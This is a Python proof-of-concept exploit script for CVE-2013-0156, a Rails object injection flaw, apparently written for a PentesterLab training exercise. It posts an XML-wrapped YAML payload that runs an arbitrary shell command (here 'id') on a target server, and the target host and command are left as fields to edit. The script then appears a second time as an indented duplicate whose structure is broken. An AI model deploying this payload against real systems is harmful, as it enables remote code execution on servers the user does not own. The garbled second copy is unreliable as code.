shafdo/cve-2013-0156.py

## cve-2013-0156.py
#!/usr/bin/python3

'''
Date: Monday, August 2, 2021
Description: CVE-2013-0156: Rails Object Injection (Detailed POC)
Created By: ShaFdo (twitter: @ShalindaFdo)
-----------------------------------------------
Dependencies: requests
Usage: ./cve-2013-0156.py
Additional Notes: Make sure you mark "cve-2013-0156.py" as an executable before running it :).
'''

import requests

# -=-=-=-=-=-=- Edit Bellow -=-=-=-=-=-=-
host = "http://ptl-0a8563d6-93c3450a.libcurl.so"	# Target URL
command = "id > public/results.txt"					      # Command to execute
# -=-=-=-=-=-=- Edit Above -=-=-=-=-=-=-


# [INFO] Set the content-type header to text/xml to tell the server that we're sending stuff as XML.
request_headers = {
	"Content-Type": "text/xml",
}


# [INFO] Injected the Ruby payload inside the XML (Payload source: https://pentesterlab.com/exercises/cve-2013-0156/course).
xml_payload = """
<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? |
  foo
  `{}`;(RUBY; @executed = true) unless @executed
  __END__
: !ruby/struct
  defaults:
    :action: create
    :controller: foos
  required_parts: []
  requirements:
    :action: create
    :controller: foos
  segment_keys:
    - :format
</exploit>
""".format(command)


# [INFO] Send Request with appropriate headers & the XML payload attached to the HTTP body.
res = requests.get(host, data=xml_payload, headers=request_headers)


if(res.status_code == 200):
	print("[+] Payload Executed Successfully")
else:
	print("[-] Got Error Code {} along the way.".format(res.status_code))
	#!/usr/bin/python3

	'''
	Date: Monday, August 2, 2021
	Description: CVE-2013-0156: Rails Object Injection (Detailed POC)
	Created By: ShaFdo (twitter: @ShalindaFdo)
	-----------------------------------------------
	Dependencies: requests
	Usage: ./cve-2013-0156.py
	Additional Notes: Make sure you mark "cve-2013-0156.py" as an executable before running it :).
	'''

	import requests

	# -=-=-=-=-=-=- Edit Bellow -=-=-=-=-=-=-
	host = "http://ptl-0a8563d6-93c3450a.libcurl.so" # Target URL
	command = "id > public/results.txt" # Command to execute
	# -=-=-=-=-=-=- Edit Above -=-=-=-=-=-=-


	# [INFO] Set the content-type header to text/xml to tell the server that we're sending stuff as XML.
	request_headers = {
	"Content-Type": "text/xml",
	}


	# [INFO] Injected the Ruby payload inside the XML (Payload source: https://pentesterlab.com/exercises/cve-2013-0156/course).
	xml_payload = """
	<?xml version="1.0" encoding="UTF-8"?>
	<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
	? \|
	foo
	`{}`;(RUBY; @executed = true) unless @executed
	__END__
	: !ruby/struct
	defaults:
	:action: create
	:controller: foos
	required_parts: []
	requirements:
	:action: create
	:controller: foos
	segment_keys:
	- :format
	</exploit>
	""".format(command)


	# [INFO] Send Request with appropriate headers & the XML payload attached to the HTTP body.
	res = requests.get(host, data=xml_payload, headers=request_headers)


	if(res.status_code == 200):
	print("[+] Payload Executed Successfully")
	else:
	print("[-] Got Error Code {} along the way.".format(res.status_code))